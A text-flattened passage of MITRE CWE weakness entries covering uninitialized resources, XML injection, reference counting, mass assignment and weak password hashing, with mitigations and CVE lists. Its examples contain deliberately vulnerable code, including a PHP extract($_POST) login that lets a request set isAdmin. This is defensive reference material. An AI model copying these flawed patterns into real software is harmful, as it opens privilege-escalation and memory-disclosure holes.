The software uses or accesses a resource that has not been initialized. - When a resource has not been properly initialized, the software may behave unexpectedly. This may lead to a crash or invalid memory access, but the consequences vary depending on the type of resource and how it is used within the software. - - - - - - - Primary - - - Resultant - - - - - - - - Implementation - - - Medium - - - Confidentiality - Read Memory - Read Application Data - When reusing a resource such as memory or a program variable, the original contents of that resource may not be cleared before it is sent to an untrusted party. - - - Availability - DoS: Crash, Exit, or Restart - The uninitialized resource may contain values that cause program flow to change in ways that the programmer did not intend. - - - - - Implementation - Explicitly initialize the resource before use. If this is performed through an API function or standard procedure, follow all required steps. - - - Implementation - Pay close attention to complex conditionals that affect initialization, since some branches might not perform the initialization. - - - Implementation - Avoid race conditions (CWE-362) during initialization routines. - - - Build and Compilation - Run or compile the software with settings that generate warnings about uninitialized variables or data. - - - - - Here, a boolean initiailized field is consulted to ensure that initialization tasks are only completed once. However, the field is mistakenly set to true during static initialization, so the initialization code is never reached. - - private boolean initialized = true;public void someMethod() { - if (!initialized) { - - - // perform initialization tasks - ... - initialized = true; - } - - - - - - The following code intends to limit certain operations to the administrator only. - - $username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {$uid = ExtractUserID($state);} - - # do stuff - if ($uid == 0) {DoAdminThings();} - - If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to "0" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident. - - - The following code intends to concatenate a string to a variable and print the string. - - char str[20];strcat(str, "hello world");printf("%s", str); - - This might seem innocent enough, but str was not initialized, so it contains random memory. As a result, str[0] might not contain the null terminator, so the copy might start at an offset other than 0. The consequences can vary, depending on the underlying memory. - If a null terminator is found before str[8], then some bytes of random garbage will be printed before the "hello world" string. The memory might contain sensitive information from previous uses, such as a password (which might occur as a result of CWE-14 or CWE-244). In this example, it might not be a big deal, but consider what could happen if large amounts of memory are printed out before the null terminator is found. - If a null terminator isn't found before str[8], then a buffer overflow could occur, since strcat will first look for the null terminator, then copy 12 bytes starting with that location. Alternately, a buffer over-read might occur (CWE-126) if a null terminator isn't found before the end of the memory segment is reached, leading to a segmentation fault and crash. - - - This example will leave test_string in an - unknown condition when i is the same value as err_val, - because test_string is not initialized - (CWE-456). Depending on where this code segment appears - (e.g. within a function body), test_string might be - random if it is stored on the heap or stack. If the - variable is declared in static memory, it might be zero - or NULL. Compiler optimization might contribute to the - unpredictability of this address. - - char *test_string; - if (i != err_val) - { - test_string = "Hello World!"; - } - printf("%s", test_string); - - When the printf() is reached, - test_string might be an unexpected address, so the - printf might print junk strings (CWE-457). - - To fix this code, there are a couple approaches to - making sure that test_string has been properly set once - it reaches the printf(). - One solution would be to set test_string to an - acceptable default before the conditional: - - - char *test_string = "Done at the beginning"; - if (i != err_val) - { - test_string = "Hello World!"; - } - printf("%s", test_string); - - Another solution is to ensure that each - branch of the conditional - including the default/else - branch - could ensure that test_string is set: - - char *test_string; - if (i != err_val) - { - test_string = "Hello World!"; - } - else { - test_string = "Done on the other side!"; - } - printf("%s", test_string); - - - - - - CVE-2019-9805 - Chain: Creation of the packet client occurs before initialization is complete (CWE-696) resulting in a read from uninitialized memory (CWE-908), causing memory corruption. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9805 - - - CVE-2008-4197 - Use of uninitialized memory may allow code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4197 - - - CVE-2008-2934 - Free of an uninitialized pointer leads to crash and possible code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2934 - - - CVE-2008-0063 - Product does not clear memory contents when generating an error message, leading to information leak. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063 - - - CVE-2008-0062 - Lack of initialization triggers NULL pointer dereference or double-free. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062 - - - CVE-2008-0081 - Uninitialized variable leads to code execution in popular desktop application. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0081 - - - CVE-2008-3688 - Chain: Uninitialized variable leads to infinite loop. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3688 - - - CVE-2008-3475 - Chain: Improper initialization leads to memory corruption. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3475 - - - CVE-2005-1036 - Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1036 - - - CVE-2008-3597 - Chain: game server can access player data structures before initialization has happened leading to NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3597 - - - CVE-2009-2692 - Chain: uninitialized function pointers can be dereferenced allowing code execution - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692 - - - CVE-2009-0949 - Chain: improper initialization of memory can lead to NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0949 - - - CVE-2009-3620 - Chain: some unprivileged ioctls do not verify that a structure has been initialized before invocation, leading to NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620 - - - - - EXP33-C - Do not read uninitialized memory - CWE More Abstract - - - - - - - - CWE Content Team - MITRE - 2012-12-21 - New weakness based on discussion on the CWE research list in December 2012. - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Observed_Examples - - - - - The software does not initialize a critical resource. - Many resources require initialization before they can be properly used. If a resource is not initialized, it could contain unpredictable or expired data, or it could be initialized to defaults that are invalid. This can have security implications when the resource is expected to have certain properties or values. - - - - - - - - Primary - - - Resultant - - - - - - - - Implementation - - - Medium - - - Confidentiality - Read Memory - Read Application Data - When reusing a resource such as memory or a program variable, the original contents of that resource may not be cleared before it is sent to an untrusted party. - - - Availability - DoS: Crash, Exit, or Restart - The uninitialized resource may contain values that cause program flow to change in ways that the programmer did not intend. - - - - - Implementation - Explicitly initialize the resource before use. If this is performed through an API function or standard procedure, follow all specified steps. - - - Implementation - Pay close attention to complex conditionals that affect initialization, since some branches might not perform the initialization. - - - Implementation - Avoid race conditions (CWE-362) during initialization routines. - - - Build and Compilation - Run or compile your software with settings that generate warnings about uninitialized variables or data. - - - - - Here, a boolean initiailized field is consulted to ensure that initialization tasks are only completed once. However, the field is mistakenly set to true during static initialization, so the initialization code is never reached. - - private boolean initialized = true;public void someMethod() { - if (!initialized) { - - - // perform initialization tasks - ... - initialized = true; - } - - - - - - The following code intends to limit certain operations to the administrator only. - - $username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {$uid = ExtractUserID($state);} - - # do stuff - if ($uid == 0) {DoAdminThings();} - - If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to "0" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident. - - - The following code intends to concatenate a string to a variable and print the string. - - char str[20];strcat(str, "hello world");printf("%s", str); - - This might seem innocent enough, but str was not initialized, so it contains random memory. As a result, str[0] might not contain the null terminator, so the copy might start at an offset other than 0. The consequences can vary, depending on the underlying memory. - If a null terminator is found before str[8], then some bytes of random garbage will be printed before the "hello world" string. The memory might contain sensitive information from previous uses, such as a password (which might occur as a result of CWE-14 or CWE-244). In this example, it might not be a big deal, but consider what could happen if large amounts of memory are printed out before the null terminator is found. - If a null terminator isn't found before str[8], then a buffer overflow could occur, since strcat will first look for the null terminator, then copy 12 bytes starting with that location. Alternately, a buffer over-read might occur (CWE-126) if a null terminator isn't found before the end of the memory segment is reached, leading to a segmentation fault and crash. - - - This example will leave test_string in an - unknown condition when i is the same value as err_val, - because test_string is not initialized - (CWE-456). Depending on where this code segment appears - (e.g. within a function body), test_string might be - random if it is stored on the heap or stack. If the - variable is declared in static memory, it might be zero - or NULL. Compiler optimization might contribute to the - unpredictability of this address. - - char *test_string; - if (i != err_val) - { - test_string = "Hello World!"; - } - printf("%s", test_string); - - When the printf() is reached, - test_string might be an unexpected address, so the - printf might print junk strings (CWE-457). - - To fix this code, there are a couple approaches to - making sure that test_string has been properly set once - it reaches the printf(). - One solution would be to set test_string to an - acceptable default before the conditional: - - - char *test_string = "Done at the beginning"; - if (i != err_val) - { - test_string = "Hello World!"; - } - printf("%s", test_string); - - Another solution is to ensure that each - branch of the conditional - including the default/else - branch - could ensure that test_string is set: - - char *test_string; - if (i != err_val) - { - test_string = "Hello World!"; - } - else { - test_string = "Done on the other side!"; - } - printf("%s", test_string); - - - - - - CVE-2020-20739 - A variable that has its value set in a conditional statement is sometimes used when the conditional fails, sometimes causing data leakage - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-20739 - - - CVE-2005-1036 - Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1036 - - - - - CWE Content Team - MITRE - 2012-12-21 - New weakness based on discussion on the CWE research list in December 2012. - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Observed_Examples - - - - - The software does not properly neutralize special elements that are used in XML, allowing attackers to modify the syntax, content, or commands of the XML before it is processed by an end system. - Within XML, special elements could include reserved words or characters such as "<", ">", """, and "&", which could then be used to add new data or modify XML syntax. - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Confidentiality - Integrity - Availability - Execute Unauthorized Code or Commands - Read Application Data - Modify Application Data - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - - - XML injection (aka Blind Xpath injection) - - - A2 - Injection Flaws - CWE More Specific - - - A6 - Injection Flaws - CWE More Specific - - - 23 - XML Injection - - - SFP24 - Tainted input to command - - - - - - - - - - - - The description for this entry is generally applicable to XML, but the name includes "blind XPath injection" which is more closely associated with CWE-643. Therefore this entry might need to be deprecated or converted to a general category - although injection into raw XML is not covered by CWE-643 or CWE-652. - In vulnerability theory terms, this is a representation-specific case of a Data/Directive Boundary Error. - Under-reported. This is likely found regularly by third party code auditors, but there are very few publicly reported examples. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Maintenance_Notes, Other_Notes, Theoretical_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - The software uses or accesses a file descriptor after it has been closed. - After a file descriptor for a particular file or device has been released, it can be reused. The code might not write to the original file, since the reused file descriptor might reference a different file or device. - - - - - - Primary - - - Resultant - - - - - - - - - - Stale file descriptor - - - - - Implementation - - - Medium - - - Confidentiality - Read Files or Directories - The program could read data from the wrong file. - - - Availability - DoS: Crash, Exit, or Restart - Accessing a file descriptor that has been closed can cause a crash. - - - - - FIO46-C - Do not access a closed file - Exact - - - - - CWE Content Team - MITRE - 2012-12-21 - New weakness based on discussion on the CWE research list in December 2012. - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software uses a reference count to manage a resource, but it does not update or incorrectly updates the reference count. - Reference counts can be used when tracking how many objects contain a reference to a particular resource, such as in memory management or garbage collection. When the reference count reaches zero, the resource can be de-allocated or reused because there are no more objects that use it. If the reference count accidentally reaches zero, then the resource might be released too soon, even though it is still in use. If all objects no longer use the resource, but the reference count is not zero, then the resource might not ever be released. - - - - - - - - Primary - - - - - - - - - - Implementation - - - Medium - - - CVE-2002-0574 - chain: reference count is not decremented, leading to memory leak in OS by sending ICMP packets. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0574 - - - CVE-2004-0114 - Reference count for shared memory not decremented when a function fails, potentially allowing unprivileged users to read kernel memory. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0114 - - - CVE-2006-3741 - chain: improper reference count tracking leads to file descriptor consumption - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3741 - - - CVE-2007-1383 - chain: integer overflow in reference counter causes the same variable to be destroyed twice. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1383 - - - CVE-2007-1700 - Incorrect reference count calculation leads to improper object destruction and code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1700 - - - CVE-2008-2136 - chain: incorrect update of reference count leads to memory leak. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2136 - - - CVE-2008-2785 - chain/composite: use of incorrect data type for a reference counter allows an overflow of the counter, leading to a free of memory that is still in use. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2785 - - - CVE-2008-5410 - Improper reference counting leads to failure of cryptographic operations. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5410 - - - CVE-2009-1709 - chain: improper reference counting in a garbage collection routine leads to use-after-free - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1709 - - - CVE-2009-3553 - chain: reference count not correctly maintained when client disconnects during a large operation, leading to a use-after-free. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3553 - - - CVE-2009-3624 - Reference count not always incremented, leading to crash or code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3624 - - - CVE-2010-0176 - improper reference counting leads to expired pointer dereference. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0176 - - - CVE-2010-0623 - OS kernel increments reference count twice but only decrements once, leading to resource consumption and crash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0623 - - - CVE-2010-2549 - OS kernel driver allows code execution - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2549 - - - CVE-2010-4593 - improper reference counting leads to exhaustion of IP addresses - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4593 - - - CVE-2011-0695 - Race condition causes reference counter to be decremented prematurely, leading to the destruction of still-active object and an invalid pointer dereference. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0695 - - - CVE-2012-4787 - improper reference counting leads to use-after-free - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4787 - - - - - - - - CWE Content Team - MITRE - 2012-12-21 - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Type - - - - - The software contains functionality that is not documented, not part of the specification, and not accessible through an interface or command sequence that is obvious to the software's users or administrators. - Hidden functionality can take many forms, such as intentionally malicious code, "Easter Eggs" that contain extraneous functionality such as games, developer-friendly shortcuts that reduce maintenance or support costs such as hard-coded accounts, etc. From a security perspective, even when the functionality is not intentionally malicious or damaging, it can increase the software's attack surface and expose additional weaknesses beyond what is already exposed by the intended functionality. Even if it is not easily accessible, the hidden functionality could be useful for attacks that modify the control flow of the application. - - - - - - Architecture and Design - - - Implementation - - - - - Other - Integrity - Varies by Context - Alter Execution Logic - - - - - Installation - Always verify the integrity of the software that is being installed. - - - Testing - Conduct a code coverage analysis using live testing, then closely inspect any code that is not covered. - - - - - - - - - CWE Content Team - MITRE - 2012-12-28 - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software does not properly restrict reading from or writing to dynamically-managed code resources such as variables, objects, classes, attributes, functions, or executable instructions or statements. - Many languages offer powerful features that allow the programmer to dynamically create or modify existing code, or resources used by code such as variables and objects. While these features can offer significant flexibility and reduce development time, they can be extremely dangerous if attackers can directly influence these code resources in unexpected ways. - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Execute Unauthorized Code or Commands - - - Other - Integrity - Varies by Context - Alter Execution Logic - - - - - Implementation - Input Validation - For any externally-influenced input, check the input against an allowlist of acceptable values. - - - Implementation - Architecture and Design - Refactoring - Refactor the code so that it does not need to be dynamically managed. - - - - - CWE Content Team - MITRE - 2013-01-26 - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - - - The software does not properly restrict reading from or writing to dynamically-identified variables. - Many languages offer powerful features that allow the programmer to access arbitrary variables that are specified by an input string. While these features can offer significant flexibility and reduce development time, they can be extremely dangerous if attackers can modify unintended variables that have security implications. - - - - - - - Primary - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Modify Application Data - An attacker could modify sensitive data or program variables. - - - Integrity - Execute Unauthorized Code or Commands - - - Other - Integrity - Varies by Context - Alter Execution Logic - - - - - Implementation - Input Validation - For any externally-influenced input, check the input against an allowlist of internal program variables that are allowed to be modified. - - - Implementation - Architecture and Design - Refactoring - Refactor the code so that internal program variables do not need to be dynamically identified. - - - - - This code uses the credentials sent in a POST request to login a user. - - - //Log user in, and set $isAdmin to true if user is an administrator - - function login($user,$pass){$query = buildQuery($user,$pass);mysql_query($query);if(getUserRole($user) == "Admin"){$isAdmin = true;}} - $isAdmin = false;extract($_POST);login(mysql_real_escape_string($user),mysql_real_escape_string($pass)); - - The call to extract() will overwrite the existing values of any variables defined previously, in this case $isAdmin. An attacker can send a POST request with an unexpected third value "isAdmin" equal to "true", thus gaining Admin privileges. - - - - - CVE-2006-7135 - extract issue enables file inclusion - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7135 - - - CVE-2006-7079 - extract used for register_globals compatibility layer, enables path traversal - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7079 - - - CVE-2007-0649 - extract() buried in include files makes post-disclosure analysis confusing; original report had seemed incorrect. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0649 - - - CVE-2006-6661 - extract() enables static code injection - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6661 - - - CVE-2006-2828 - import_request_variables() buried in include files makes post-disclosure analysis confusing - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2828 - - - CVE-2009-0422 - Chain: Dynamic variable evaluation allows resultant remote file inclusion and path traversal. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0422 - - - CVE-2007-2431 - Chain: dynamic variable evaluation in PHP program used to modify critical, unexpected $_SERVER variable for resultant XSS. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2431 - - - CVE-2006-4904 - Chain: dynamic variable evaluation in PHP program used to conduct remote file inclusion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4904 - - - CVE-2006-4019 - Dynamic variable evaluation in mail program allows reading and modifying attachments and preferences of other users. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4019 - - - - - CWE Content Team - MITRE - 2013-01-26 - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - - - The software receives input from an upstream component that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified. - - If the object contains attributes that were only intended for internal use, then their unexpected modification could lead to a vulnerability. - This weakness is sometimes known by the language-specific mechanisms that make it possible, such as mass assignment, autobinding, or object injection. - - - - - - - - Primary - - - - - - - - - - - - Mass Assignment - "Mass assignment" is the name of a feature in Ruby on Rails that allows simultaneous modification of multiple object attributes. - - - AutoBinding - The "Autobinding" term is used in frameworks such as Spring MVC and ASP.NET MVC. - - - PHP Object Injection - Some PHP application researchers use this term for attacking unsafe use of the unserialize() function, but it is also used for CWE-502. - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Modify Application Data - An attacker could modify sensitive data or program variables. - - - Integrity - Execute Unauthorized Code or Commands - - - Other - Integrity - Varies by Context - Alter Execution Logic - - - - - Implementation - - If available, use features of the language or framework that allow specification of allowlists of attributes or fields that are allowed to be modified. If possible, prefer allowlists over denylists. - For applications written with Ruby on Rails, use the attr_accessible (allowlist) or attr_protected (denylist) macros in each class that may be used in mass assignment. - - - - Architecture and Design - Implementation - If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified. - - - Implementation - Input Validation - For any externally-influenced input, check the input against an allowlist of internal object attributes or fields that are allowed to be modified. - - - Implementation - Architecture and Design - Refactoring - Refactor the code so that object attributes or fields do not need to be dynamically identified, and only expose getter/setter functionality for the intended attributes. - - - - - CVE-2012-2054 - Mass assignment allows modification of arbitrary attributes using modified URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2054 - - - CVE-2012-2055 - Source version control product allows modification of trusted key using mass assignment. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2055 - - - CVE-2008-7310 - Attackers can bypass payment step in e-commerce software. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7310 - - - CVE-2013-1465 - Use of PHP unserialize function on untrusted input allows attacker to modify application configuration. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1465 - - - CVE-2012-3527 - Use of PHP unserialize function on untrusted input in content management system might allow code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3527 - - - CVE-2012-0911 - Use of PHP unserialize function on untrusted input in content management system allows code execution using a crafted cookie value. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0911 - - - CVE-2012-0911 - Content management system written in PHP allows unserialize of arbitrary objects, possibly allowing code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0911 - - - CVE-2011-4962 - Content management system written in PHP allows code execution through page comments. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4962 - - - CVE-2009-4137 - Use of PHP unserialize function on cookie value allows remote code execution or upload of arbitrary files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4137 - - - CVE-2007-5741 - Content management system written in Python interprets untrusted data as pickles, allowing code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5741 - - - CVE-2011-2520 - Python script allows local users to execute code via pickled data. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2520 - - - CVE-2005-2875 - Python script allows remote attackers to execute arbitrary code using pickled objects. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2875 - - - CVE-2013-0277 - Ruby on Rails allows deserialization of untrusted YAML to execute arbitrary code. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0277 - - - CVE-2011-2894 - Spring framework allows deserialization of objects from untrusted sources to execute arbitrary code. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2894 - - - CVE-2012-1833 - Grails allows binding of arbitrary parameters to modify arbitrary object properties. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1833 - - - CVE-2010-3258 - Incorrect deserialization in web browser allows escaping the sandbox. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3258 - - - CVE-2008-1013 - Media library allows deserialization of objects by untrusted Java applets, leading to arbitrary code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1013 - - - - - - - - - - - - - - - - - - The relationships between CWE-502 and CWE-915 need further exploration. CWE-915 is more narrowly scoped to object modification, and is not necessarily used for deserialization. - - - - CWE Content Team - MITRE - 2013-01-26 - - - CWE Content Team - MITRE - 2013-07-17 - updated References - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Alternate_Terms, Potential_Mitigations - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - Dan Amodio, Dave Wichers - Aspect Security - 2013-01-26 - Suggested adding mass assignment, provided references, and clarified relationship with AutoBinding. - - - - - The software generates a hash for a password, but it uses a scheme that does not provide a sufficient level of computational effort that would make password cracking attacks infeasible or expensive. - - Many password storage mechanisms compute a hash and store the hash, instead of storing the original password in plaintext. In this design, authentication involves accepting an incoming password, computing its hash, and comparing it to the stored hash. - Many hash algorithms are designed to execute quickly with minimal overhead, even cryptographic hashes. However, this efficiency is a problem for password storage, because it can reduce an attacker's workload for brute-force password cracking. If an attacker can obtain the hashes through some other method (such as SQL injection on a database that stores hashes), then the attacker can store the hashes offline and use various techniques to crack the passwords by computing hashes efficiently. Without a built-in workload, modern attacks can compute large numbers of hashes, or even exhaust the entire space of all possible passwords, within a very short amount of time, using massively-parallel computing (such as cloud computing) and GPU, ASIC, or FPGA hardware. In such a scenario, an efficient hash algorithm helps the attacker. - There are several properties of a hash scheme that are relevant to its strength against an offline, massively-parallel attack: - - - The amount of CPU time required to compute the hash ("stretching") - The amount of memory required to compute the hash ("memory-hard" operations) - Including a random value, along with the password, as input to the hash computation ("salting") - Given a hash, there is no known way of determining an input (e.g., a password) that produces this hash value, other than by guessing possible inputs ("one-way" hashing) - Relative to the number of all possible hashes that can be generated by the scheme, there is a low likelihood of producing the same hash for multiple different inputs ("collision resistance") - - - Note that the security requirements for the software may vary depending on the environment and the value of the passwords. Different schemes might not provide all of these properties, yet may still provide sufficient security for the environment. Conversely, a solution might be very strong in preserving one property, which still being very weak for an attack against another property, or it might not be able to significantly reduce the efficiency of a massively-parallel attack. - - - - - - - - Primary - - - - - - - - Architecture and Design - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Bypass Protection Mechanism - Gain Privileges or Assume Identity - If an attacker can gain access to the hashes, then the lack of sufficient computational effort will make it easier to conduct brute force attacks using techniques such as rainbow tables, or specialized hardware such as GPUs, which can be much faster than general-purpose CPUs for computing hashes. - - - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - - - SOAR Partial - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - High - - - Automated Static Analysis - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Configuration Checker - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to 